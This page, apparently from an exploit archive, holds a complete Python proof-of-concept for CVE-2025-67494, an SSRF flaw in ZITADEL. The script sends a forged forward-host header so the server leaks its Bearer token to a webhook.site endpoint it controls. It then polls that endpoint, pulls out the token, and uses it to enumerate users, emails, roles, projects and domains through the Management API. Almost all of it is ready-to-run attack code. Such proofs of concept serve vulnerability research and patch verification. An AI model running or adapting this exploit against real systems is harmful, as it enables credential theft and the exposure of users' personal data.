4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval
"""

import requests
import json
import argparse
import time
from urllib.parse import urlparse
from pwn import log

SEARCH_QUERY = {"query": {"offset": "0", "limit": 10}}

class WebhookManager:
    def __init__(self):
        self.token = None
        self.url = None
    
    def create(self):
        """Create a webhook.site URL via API and return the token and URL"""
        try:
            response = requests.post("https://webhook.site/token", timeout=10)
            if response.status_code in [200, 201]:
                data = response.json()
                token = data.get('uuid')
                if token:
                    self.token = token
                    self.url = f"https://webhook.site/{token}"
                    return token, self.url
        except Exception as e:
            log.error(f"Error creating webhook: {e}")
        return None, None
    
    def get_requests(self, timeout=60):
        """Poll webhook.site API to get requests"""
        if not self.token:
            return None
        
        url = f"https://webhook.site/token/{self.token}/requests"
        start_time = time.time()
        poll_interval = 5
        last_check = 0
        
        while time.time() - start_time < timeout:
            elapsed = time.time() - start_time
            try:
                response = requests.get(url, timeout=10)
                if response.status_code == 200:
                    data = response.json()
                    total = data.get('total', 0) if isinstance(data, dict) else 0
                    if total > last_check:
                        log.info(f"Webhook received {total} request(s)...")
                        last_check = total
                    
                    if data and 'data' in data and len(data['data']) > 0:
                        return data['data']
                
                remaining = int(timeout - elapsed)
                if remaining > 0 and remaining % 10 == 0 and elapsed > 5:
                    log.info(f"Waiting for SSRF request... ({remaining}s remaining)")
            except Exception as e:
                log.error(f"Error polling webhook: {e}")
            
            if elapsed < timeout:
                time.sleep(poll_interval)
        
        return None
    
    def extract_bearer_token(self, requests_data):
        """Extract Bearer token from webhook requests"""
        if not requests_data:
            return None
        
        for req in requests_data:
            headers = req.get('headers', {})
            if not headers:
                continue
            
            for key, value in headers.items():
                if key.lower() == 'authorization':
                    auth_header = value
                    if isinstance(auth_header, list):
                        auth_header = auth_header[0] if auth_header else ""
                    if isinstance(auth_header, str) and auth_header.startswith('Bearer '):
                        return auth_header[7:]
        return None

class SSRFExploiter:
    def __init__(self, target_url):
        self.target_url = target_url
    
    def exploit(self, oob_host):
        log.info(f"Exploiting SSRF to {self.target_url}")
        log.info(f"OOB host: {oob_host}")
        
        url = f"{self.target_url}/ui/v2/login"
        headers = {"x-zitadel-forward-host": oob_host}
        
        try:
            response = requests.get(url, headers=headers, timeout=30)
            log.success(f"SSRF request sent (status: {response.status_code})")
            return True
        except Exception as e:
            log.error(f"Error during SSRF exploitation: {e}")
            return False

def api_request(method="GET", endpoint="", error_msg=""):
    """Decorator for ZITADEL API requests"""
    def decorator(func):
        def wrapper(self, *args, **kwargs):
            url = f"{self.base_url}/management/v1/{endpoint}"
            headers = {"Authorization": f"Bearer {self.token}"}
            payload = SEARCH_QUERY if method == "POST" else None
            if payload:
                headers["Content-Type"] = "application/json"
            
            try:
                req_func = requests.get if method == "GET" else requests.post
                response = req_func(url, headers=headers, json=payload, timeout=10)
                if response.status_code == 200:
                    return response.json()
            except Exception as e:
                if error_msg:
                    log.error(f"{error_msg}: {e}")
            return None
        return wrapper
    return decorator

class ZitadelAPI:
    def __init__(self, base_url, token):
        self.base_url = base_url
        self.token = token
    
    @api_request(method="GET", endpoint="iam", error_msg="Error retrieving IAM info")
    def get_iam_info(self):
        pass
    
    @api_request(method="GET", endpoint="orgs/me", error_msg="Error retrieving org info")
    def get_org_info(self):
        pass
    
    @api_request(method="POST", endpoint="users/_search", error_msg="Error listing users")
    def list_users(self):
        pass
    
    @api_request(method="POST", endpoint="projects/_search", error_msg="Error listing projects")
    def list_projects(self):
        pass
    
    @api_request(method="POST", endpoint="orgs/me/members/_search", error_msg="Error listing members")
    def list_org_members(self):
        pass
    
    @api_request(method="POST", endpoint="orgs/me/domains/_search", error_msg="Error listing domains")
    def list_org_domains(self):
        pass
    
    def get_user_memberships(self, user_id):
        return self._request(f"users/{user_id}/memberships/_search", "POST", SEARCH_QUERY, "Error retrieving memberships")
    
    def _request(self, endpoint, method="GET", data=None, error_msg=""):
        """Generic function to make API requests to ZITADEL Management API"""
        url = f"{self.base_url}/management/v1/{endpoint}"
        headers = {"Authorization": f"Bearer {self.token}"}
        if data:
            headers["Content-Type"] = "application/json"
        
        try:
            func = requests.get if method == "GET" else requests.post
            response = func(url, headers=headers, json=data, timeout=10)
            if response.status_code == 200:
                return response.json()
        except Exception as e:
            if error_msg:
                log.error(f"{error_msg}: {e}")
        return None

class DataFormatter:
    @staticmethod
    def _format_list(data, key='result', formatter=None):
        if not data or key not in data or not data[key]:
            return None
        items = [formatter(item) for item in data[key] if formatter(item)]
        return "\n".join(items) if items else None
    
    @staticmethod
    def format_iam_info(data):
        if not data:
            return None
        gid = data.get('globalOrgId', 'N/A')
        pid = data.get('iamProjectId', 'N/A')
        did = data.get('defaultOrgId', 'N/A')
        return f"Global Org ID: {gid}\nIAM Project ID: {pid}\nDefault Org ID: {did}"
    
    @staticmethod
    def format_org_info(data):
        if not data or 'org' not in data:
            return None
        org = data['org']
        oid = org.get('id', 'N/A')
        name = org.get('name', 'N/A')
        state = org.get('state', 'N/A')
        domain = org.get('primaryDomain', 'N/A')
        return f"ID: {oid}\nName: {name}\nState: {state}\nPrimary Domain: {domain}"
    
    @staticmethod
    def format_users(data):
        def fmt_user(user):
            user_type = "Machine" if 'machine' in user else "Human"
            username = user.get('userName', 'N/A')
            state = user.get('state', 'N/A')
            if 'human' in user and 'email' in user['human']:
                email = user['human']['email'].get('email', 'N/A')
                return f"{user_type}: {username} ({email}) - {state}"
            return f"{user_type}: {username} - {state}"
        return DataFormatter._format_list(data, 'result', fmt_user)
    
    @staticmethod
    def format_projects(data):
        def fmt_project(project):
            return f"{project.get('name', 'N/A')} (ID: {project.get('id', 'N/A')}) - {project.get('state', 'N/A')}"
        return DataFormatter._format_list(data, 'result', fmt_project)
    
    @staticmethod
    def format_members(data):
        def fmt_member(member):
            email = member.get('email', 'N/A')
            roles = ", ".join(member.get('roles', []))
            return f"{email} - Roles: {roles}"
        return DataFormatter._format_list(data, 'result', fmt_member)
    
    @staticmethod
    def format_domains(data):
        def fmt_domain(domain):
            domain_name = domain.get('domainName', 'N/A')
            verified = "Verified" if domain.get('isVerified') else "Not Verified"
            primary = "Primary" if domain.get('isPrimary') else ""
            return f"{domain_name} - {verified} {primary}".strip()
        return DataFormatter._format_list(data, 'result', fmt_domain)
    
    @staticmethod
    def format_memberships(data):
        def fmt_membership(membership):
            org_name = membership.get('displayName', 'N/A')
            roles = ", ".join(membership.get('roles', []))
            iam = "IAM" if membership.get('iam') else "Org"
            return f"{iam}: {org_name} - Roles: {roles}"
        return DataFormatter._format_list(data, 'result', fmt_membership)

def print_info(title, data, formatter=None):
    if not data:
        return
    log.info(f"\n{'='*60}")
    log.info(f"{title}")
    log.info(f"{'='*60}")
    if formatter:
        formatted = formatter(data)
        if formatted:
            log.info(formatted)
    else:
        print(json.dumps(data, indent=2, ensure_ascii=False))

def main():
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval")
    parser.add_argument('-u', '--ui-url', required=True, help='ZITADEL Login UI URL (e.g., http://localhost:29000)')
    parser.add_argument('-a', '--api-url', help='ZITADEL Management API URL (e.g., http://localhost:28080). If not provided, will be auto-detected from UI URL')
    parser.add_argument('--timeout', type=int, default=60, help='Timeout in seconds (default: 60)')
    args = parser.parse_args()
    
    ui_url = args.ui_url
    if args.api_url:
        base_url = args.api_url
    else:
        parsed = urlparse(ui_url)
        base_url = f"{parsed.scheme}://{parsed.hostname}:28080" if parsed.port == 29000 else f"{parsed.scheme}://{parsed.netloc}"
    
    log.info("Starting CVE-2025-67494 exploit")
    log.info(f"UI URL: {ui_url}, API URL: {base_url}")
    
    webhook = WebhookManager()
    log.info("Creating webhook.site URL via API...")
    webhook_token, webhook_url = webhook.create()
    if not webhook_token:
        log.error("Failed to create webhook via API")
    
    oob_host = f"{webhook_token}.webhook.site"
    log.success(f"Webhook created: {webhook_url}")
    log.info(f"OOB host: {oob_host}")
    
    exploiter = SSRFExploiter(ui_url)
    log.info("Sending SSRF request...")
    exploiter.exploit(oob_host)
    
    log.info(f"Polling webhook for Bearer token (timeout: {args.timeout}s)...")
    requests_data = webhook.get_requests(args.timeout)
    
    if not requests_data:
        log.error(f"Timeout: No requests received within {args.timeout} seconds")
    
    token = webhook.extract_bearer_token(requests_data)
    if not token:
        log.error("Bearer token not found in webhook requests")
    
    log.success("Bearer token successfully retrieved!")
    log.info(f"Token: {token[:50]}...")
    log.info("Retrieving information via Management API...")
    
    api = ZitadelAPI(base_url, token)
    
    iam_info = api.get_iam_info()
    print_info("IAM Information", iam_info, DataFormatter.format_iam_info)
    
    org_info = api.get_org_info()
    print_info("Organization Information", org_info, DataFormatter.format_org_info)
    
    users = api.list_users()
    print_info("Users", users, DataFormatter.format_users)
    
    if users and 'result' in users and len(users['result']) > 0:
        first_user_id = users['result'][0]['id']
        memberships = api.get_user_memberships(first_user_id)
        print_info(f"User Memberships (User ID: {first_user_id})", memberships, DataFormatter.format_memberships)
    
    projects = api.list_projects()
    print_info("Projects", projects, DataFormatter.format_projects)
    
    members = api.list_org_members()
    print_info("Organization Members", members, DataFormatter.format_members)
    
    domains = api.list_org_domains()
    print_info("Organization Domains", domains, DataFormatter.format_domains)
    
    log.success("Exploitation completed successfully!")

if __name__ == "__main__":
    main()